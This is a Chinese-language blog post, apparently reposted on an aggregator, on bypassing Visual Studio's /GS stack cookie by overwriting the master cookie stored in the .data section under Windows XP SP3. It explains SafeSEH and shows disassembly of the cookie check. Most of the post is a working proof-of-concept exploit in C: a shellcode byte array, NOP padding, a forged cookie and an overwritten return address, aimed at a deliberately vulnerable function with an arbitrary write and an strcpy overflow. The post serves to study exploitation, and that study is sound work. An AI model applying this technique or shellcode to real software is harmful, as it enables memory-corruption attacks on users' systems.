首先 ? 如果想直接覆蓋 ?一場回調函數去劫持EXE的話 ，SafeSEH會阻止程序去執行；

SafeSEH的原理很簡單，就是對要調用的異?；卣{函數進行一系列對的有效性校驗 ? ?需要 操作系統XP SP2 及后續版本 和編譯器的雙重支持

下面說明GS的突破

?但感覺還是有點困難： ? ?1 ?要么程序寫了虛函數 ? 2要么程序主動去修改 COOKIE的值· ?3 最好的方法直接覆蓋 SEH ?典型SEH ?溢出即可

···感覺不會再愛了

?加了GS后 ?取的COOKIE：

00401000 55 push ebp 00401001 8BEC mov ebp,esp 00401003 81EC E4000000 sub esp,0xE4 00401009 A1 00304000 mov eax,dword ptr ds:[0x403000] //取.data段數據 下面于 ebp 相xor 得到 cookie 0040100E 33C5 xor eax,ebp 00401010 8945 FC mov dword ptr ss:[ebp-0x4],eax 00401013 817D 0C 9599000>cmp dword ptr ss:[ebp+0xC],0x9995 0040101A 0F8D AA000000 jge vs2005TE.004010CA

開始時將 0x403000 處取出COKIE值，然后與EBP做一次異或放入 EBP-4的位置作為 此函數的Security Cookie

函數返回前的校驗就是此過程的逆過程，程序將

1 ? EBP-4的位置取出值，

2 ?然后與EBP異或

3 ?最后于 0x00403000處的COOKIE相比較

源碼為：

/* XP SP3 VS2008 GS保護 禁止優化 */ #include <stdafx.h> #include <windows.h>char shellcode[]="\x90\x90\x90\x90""\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53" "\x68\x64\x61\x30\x23" "\x68\x23\x50\x61\x6E" "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//168"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//注意這里 盡量將90放在后面 放在前面有問題！！！ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90" "\xf4\x6f\x82\x90" //cookie 90826FF4 倒敘 我是通過 編碼直接得到 是單個字節xor "\x90\x90\x90\x90" //ebp 原來是 0012ff64 "\x94\xFE\x12\x00" //0012FE94 為返回地址 ;void test(char * S,int i,char * src) {char dest[200];if (i<0x9995){char * buf = S+i;*buf = *src;*(buf+1) = *(src+1);*(buf+2) = *(src+2);*(buf+3) = *(src+3);strcpy(dest,src);} }int main() {char * str = (char *)malloc(0x10000);test(str,0xFFFF2FB8,shellcode);//.data 0x403000//malloc 0x410048 相減 D048 //FFFFFFFF - D048 + 1= FFFF2FB8 }
最后成功：

總結

以上是生活随笔為你收集整理的替换.DATA的COOKIE突破GS的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。